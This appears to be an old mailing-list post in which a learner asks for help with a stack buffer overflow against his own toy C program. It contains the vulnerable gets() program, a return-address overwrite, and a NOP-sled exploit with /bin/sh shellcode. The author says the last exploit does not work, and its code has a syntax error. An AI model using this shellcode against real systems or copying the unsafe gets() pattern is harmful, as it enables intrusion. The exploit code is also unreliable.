More Buffer Overphlow Questions

["Jeremy Junginger" <jjunginger () interactcommerce com>]

In reading the following link, I decided to play with the examples and
try to figure out a simple buffer overflow.  Just to say I've at least
made one do something predictable.  At any rate, I have gotten to the
point where I can make the program call the function twice before
dumping.  I am a little stuck when it comes to inserting the shellcode.
I'll highlight what I think is the code I'm not understanding
completely.  Please take a look if you have time, and even if you don't,
thanks for reading the post:

http://www.neworder.box.sk/newsread.php?newsid=5333 

Below is a modified version of the code presented on the above link.  I
assume NO CREDIT for this code other than I have changed a couple of
variables.  I'm just trying to illustrate a concept rather than create
something original at this point.  Keeping this in mind, read on:

--------------------------------

/*This one works:*/ 
/*PROGRAM WITH BUFFER OF 255*/ 
/*TESTDS.C*/ 
void lame() { 
char small[255]; 
gets(small); 
printf("%s\n",small); 
} 
int main() { 
lame(); 
} 

-----------------------------------

/*Running this one and piping the output to testds makes the program run
twice:*/ 
/*PROGRAM TO OVERFLOW TESTDS*/ 
/*This will hit call lame twice, so the output should be two identical
lines followed by a core dump*/ 
/*If it does not core dump, issue the ulimit -c 10000 command*/ 
/*TESTDS_EXPLOIT.C*/ 
main() 
{ 
int i=0; char buf[268]; 
for(i=0;i<=268;i+=4) 
*(long*) &buf[i] = 0x80484ca; 
puts(buf); 
} 

------------------------------------

/*I don't think I have the memory address or something correct.  This is
where I need help.  Anyone?!?*/ 
/*PROGRAM TO RUN SHELLCODE FROM TESTDS*/ 
/*1 Fill the buffer with the return address,*/ 
/*2 Fill the buffer with NOPS,*/ 
/*3 Copy the shellcode at the end of the NOPS,*/ 
/*4 set the home variable and */ 
/*5 execute TESTDS.*/ 
char shellcode[] =
"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0" 
"\x0b\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd" 
"\x80\xe8\xde\xff\xff\xff/bin/sh";; 
int main() 
{ 
char buffer[268]; 
long retaddr = 0xbffffa10; /*Return Address, I got this from info reg
esp after overflowing the buffer*/ 
int i; 
fprintf(stderr,"using address 0x%lx\n",retaddr); 
for(i=0;i<268;i+=4) 
*(long*)&buffer[i] = retaddr; /*Fills Buffer with Ret Address*/ 
for(i=0;i<(268-strlen(shellcode)-100;i++) 
*(buffer+i) = 0x90; /*Fills the Buffer with NOPS*/ 
memcpy(buffer+i,shellcode,strlen(shellcode)); /*Shellcode is copied at
the end of the NOPS*/ 
setenv("HOME",buffer,1); /*Sets HOME VARIABLE*/ 
execlp("TESTDS","TESTDS",NULL); /*Execute Program*/ 
return 0; 
} 


Thanks for the assistance. 
-Jeremy